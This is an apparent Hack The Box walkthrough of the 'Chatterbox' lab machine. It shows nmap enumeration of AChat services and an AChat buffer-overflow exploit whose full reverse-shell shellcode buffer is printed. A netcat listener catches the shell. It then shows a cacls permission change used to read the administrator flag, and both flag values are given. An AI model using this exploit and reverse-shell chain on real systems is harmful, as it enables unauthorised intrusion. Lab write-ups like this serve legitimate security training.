██╗ ██╗███████╗███████╗██████╗
██║ ██║██╔════╝██╔════╝██╔══██╗
██║ ██║███████╗█████╗ ██████╔╝
██║ ██║╚════██║██╔══╝ ██╔══██╗
╚██████╔╝███████║███████╗██║ ██║
╚═════╝ ╚══════╝╚══════╝╚═╝ ╚═╝
1. [root:/git/htb/chatterbox]# nmap -Pn -n -sCV 10.10.10.74 --open (master✱)
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-26 10:20 CET
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 201.69 seconds
Normal nmap scan finds nothing. Trying UDP returns the same, nothing.
[root:/git/htb/chatterbox]# nmap -sU -sV --version-intensity 0 -F -n 10.10.10.74 (master✱)
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-26 10:24 CET
Nmap scan report for 10.10.10.74
Host is up (0.035s latency).
All 100 scanned ports on 10.10.10.74 are open|filtered
Expand the tcp scan by looking on all ports.
[root:/git/htb/chatterbox]# nmap -p- -T5 10.10.10.74 (master✱)
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-26 10:33 CET
Nmap scan report for chatterbox.htb (10.10.10.74)
Host is up (0.034s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE
9255/tcp open mon
9256/tcp open unknown
Version and script scan to see if we can figure out anything more about the services:
[root:/git/htb/chatterbox]# nmap -sCV -p9255,9256 10.10.10.74 (master✱)
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-26 10:38 CET
Nmap scan report for chatterbox.htb (10.10.10.74)
Host is up (0.034s latency).
PORT STATE SERVICE VERSION
9255/tcp open http AChat chat system httpd
|_http-server-header: AChat
|_http-title: Site doesn't have a title.
9256/tcp open achat AChat chat system
[root:/git/htb/chatterbox]# curl 10.10.10.74:9255 (master✱)
[root:/git/htb/chatterbox]# curl 10.10.10.74:9256 (master✱)
curl: (1) Received HTTP/0.9 when not allowed
2. Google for 'AChat enumerate port 9255 9256' and I come across 'achat reverse tcp exploit'. Downloading the files,
modify the payload-file to create a 'windows/shell_reverse_tcp' payload rather then meterpreter (no go in OSCP).
Generate the payload, edit the exploit-file with the new buf-data, and lastly change the server address (in the script)
to our victim.
[root:/git/htb/chatterbox]# ./AChat_Payload.sh (master✱)
RHOST: 10.10.10.74
LHOST: 10.10.14.5
LPORT: 4488
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/unicode_mixed
x86/unicode_mixed succeeded with size 774 (iteration=0)
x86/unicode_mixed chosen with final size 774
Payload size: 774 bytes
Final size of python file: 3767 bytes
buf = b""
buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += b"\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += b"\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += b"\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += b"\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += b"\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += b"\x47\x42\x39\x75\x34\x4a\x42\x49\x6c\x48\x68\x35\x32"
buf += b"\x39\x70\x4b\x50\x6b\x50\x53\x30\x31\x79\x6b\x35\x50"
buf += b"\x31\x55\x70\x4f\x74\x62\x6b\x42\x30\x6e\x50\x42\x6b"
buf += b"\x6e\x72\x6a\x6c\x44\x4b\x6e\x72\x4e\x34\x34\x4b\x52"
buf += b"\x52\x4d\x58\x7a\x6f\x74\x77\x4f\x5a\x4d\x56\x6d\x61"
buf += b"\x59\x6f\x74\x6c\x6f\x4c\x70\x61\x43\x4c\x6c\x42\x4c"
buf += b"\x6c\x6f\x30\x35\x71\x78\x4f\x7a\x6d\x4d\x31\x56\x67"
buf += b"\x57\x72\x4c\x32\x52\x32\x51\x47\x62\x6b\x62\x32\x4a"
buf += b"\x70\x62\x6b\x4e\x6a\x4d\x6c\x44\x4b\x30\x4c\x4e\x31"
buf += b"\x42\x58\x38\x63\x6d\x78\x59\x71\x47\x61\x70\x51\x44"
buf += b"\x4b\x52\x39\x4f\x30\x6d\x31\x78\x53\x64\x4b\x51\x39"
buf += b"\x7a\x78\x69\x53\x6e\x5a\x6d\x79\x62\x6b\x4d\x64\x64"
buf += b"\x4b\x6d\x31\x49\x46\x50\x31\x59\x6f\x54\x6c\x76\x61"
buf += b"\x36\x6f\x6c\x4d\x59\x71\x49\x37\x6e\x58\x39\x50\x43"
buf += b"\x45\x4c\x36\x6c\x43\x33\x4d\x6c\x38\x6f\x4b\x73\x4d"
buf += b"\x6b\x74\x64\x35\x6b\x34\x72\x38\x44\x4b\x52\x38\x4d"
buf += b"\x54\x7a\x61\x38\x53\x50\x66\x72\x6b\x4c\x4c\x70\x4b"
buf += b"\x34\x4b\x61\x48\x4b\x6c\x39\x71\x68\x53\x54\x4b\x6d"
buf += b"\x34\x32\x6b\x79\x71\x78\x50\x61\x79\x4f\x54\x6f\x34"
buf += b"\x6d\x54\x61\x4b\x6f\x6b\x63\x31\x42\x39\x50\x5a\x52"
buf += b"\x31\x49\x6f\x69\x50\x4f\x6f\x31\x4f\x51\x4a\x64\x4b"
buf += b"\x6a\x72\x6a\x4b\x32\x6d\x6f\x6d\x72\x48\x6c\x73\x6d"
buf += b"\x62\x4b\x50\x6d\x30\x73\x38\x53\x47\x70\x73\x70\x32"
buf += b"\x31\x4f\x50\x54\x72\x48\x6e\x6c\x50\x77\x6e\x46\x69"
buf += b"\x77\x4b\x4f\x67\x65\x57\x48\x64\x50\x6a\x61\x69\x70"
buf += b"\x59\x70\x6b\x79\x66\x64\x4f\x64\x6e\x70\x52\x48\x4d"
buf += b"\x59\x75\x30\x62\x4b\x69\x70\x59\x6f\x36\x75\x42\x30"
buf += b"\x32\x30\x72\x30\x6e\x70\x6d\x70\x4e\x70\x4d\x70\x30"
buf += b"\x50\x52\x48\x7a\x4a\x4a\x6f\x57\x6f\x67\x70\x59\x6f"
buf += b"\x47\x65\x43\x67\x70\x6a\x4a\x65\x71\x58\x4a\x6a\x69"
buf += b"\x7a\x6a\x6e\x59\x75\x32\x48\x6b\x52\x6b\x50\x6b\x61"
buf += b"\x33\x58\x34\x49\x78\x66\x70\x6a\x6e\x30\x42\x36\x51"
buf += b"\x47\x6f\x78\x35\x49\x54\x65\x30\x74\x63\x31\x79\x6f"
buf += b"\x36\x75\x62\x65\x69\x30\x73\x44\x7a\x6c\x79\x6f\x70"
buf += b"\x4e\x6a\x68\x44\x35\x5a\x4c\x30\x68\x38\x70\x57\x45"
buf += b"\x34\x62\x71\x46\x4b\x4f\x48\x55\x61\x58\x33\x33\x52"
buf += b"\x4d\x4f\x74\x6b\x50\x32\x69\x69\x53\x71\x47\x50\x57"
buf += b"\x71\x47\x6c\x71\x79\x66\x4f\x7a\x4b\x62\x32\x39\x31"
buf += b"\x46\x47\x72\x4b\x4d\x62\x46\x48\x47\x4d\x74\x4d\x54"
buf += b"\x6f\x4c\x69\x71\x6b\x51\x72\x6d\x4e\x64\x6c\x64\x6c"
buf += b"\x50\x67\x56\x49\x70\x6d\x74\x42\x34\x4e\x70\x6f\x66"
buf += b"\x71\x46\x4f\x66\x61\x36\x52\x36\x6e\x6e\x62\x36\x62"
buf += b"\x36\x6e\x73\x4e\x76\x53\x38\x30\x79\x58\x4c\x6d\x6f"
buf += b"\x74\x46\x4b\x4f\x68\x55\x62\x69\x37\x70\x6e\x6e\x62"
buf += b"\x36\x6f\x56\x4b\x4f\x4c\x70\x61\x58\x4d\x38\x54\x47"
buf += b"\x6b\x6d\x33\x30\x6b\x4f\x66\x75\x67\x4b\x49\x50\x4d"
buf += b"\x4d\x4d\x5a\x59\x7a\x61\x58\x76\x46\x34\x55\x77\x4d"
buf += b"\x53\x6d\x39\x6f\x36\x75\x6f\x4c\x5a\x66\x51\x6c\x5a"
buf += b"\x6a\x71\x70\x6b\x4b\x79\x50\x54\x35\x5a\x65\x55\x6b"
buf += b"\x31\x37\x6b\x63\x31\x62\x72\x4f\x71\x5a\x79\x70\x51"
[root:/git/htb/chatterbox]# python AChat_Exploit.py (master✱)
[+] BUFFER OVERFLOW PAYLOAD RELEASED -- CHECK YOUR HANDLER
[root:/git/htb/chatterbox]# rlwrap nc -lvnp 4488 (master✱)
listening on [any] 4488 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.74] 49161
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
chatterbox\alfred
3. Grab user.txt
C:\Users\Alfred\Desktop> type user.txt
02c94ad2f3a9d10f7f327b895249a2f8
██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████
██████╗ ██████╗ ██████╗ ████████╗
██╔══██╗██╔═══██╗██╔═══██╗╚══██╔══╝
██████╔╝██║ ██║██║ ██║ ██║
██╔══██╗██║ ██║██║ ██║ ██║
██║ ██║╚██████╔╝╚██████╔╝ ██║
╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝
1. Once we have a reverse shell as Alfred, we notice that we got read access to the \Users\Administrator directory - usually
the users don't have permission to enter this folder.
C:\Users\Administrator\Desktop> type root.txt
Access is denied.
Unfortunately we can't just print root as of yet. But maybe the privileges of the Admin dir is a good place to start.
C:\Users\Administrator\Desktop> dir root.txt /q
03/26/2021 07:51 AM 34 CHATTERBOX\Alfred root.txt
C:\Users\Administrator\Desktop> cacls root.txt /G Alfred:R
Are you sure (Y/N)? y
processed file: C:\Users\Administrator\Desktop\root.txt
C:\Users\Administrator\Desktop> type root.txt
efd540d3337ebc9d2682bec22ab89f45
██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████
██╗███╗ ██╗███████╗ ██████╗ ██████╗ ███╗ ███╗ █████╗ ████████╗██╗ ██████╗ ███╗ ██╗
██║████╗ ██║██╔════╝██╔═══██╗██╔══██╗████╗ ████║██╔══██╗╚══██╔══╝██║██╔═══██╗████╗ ██║
██║██╔██╗ ██║█████╗ ██║ ██║██████╔╝██╔████╔██║███████║ ██║ ██║██║ ██║██╔██╗ ██║
██║██║╚██╗██║██╔══╝ ██║ ██║██╔══██╗██║╚██╔╝██║██╔══██║ ██║ ██║██║ ██║██║╚██╗██║
██║██║ ╚████║██║ ╚██████╔╝██║ ██║██║ ╚═╝ ██║██║ ██║ ██║ ██║╚██████╔╝██║ ╚████║
╚═╝╚═╝ ╚═══╝╚═╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝
AChat Reverse TCP Exploit:
https://github.com/EDB4YLI55/achat_reverse_tcp_exploit
File ownership Win7:
https://superuser.com/questions/691578/how-to-display-change-the-owner-of-a-file-on-windows-7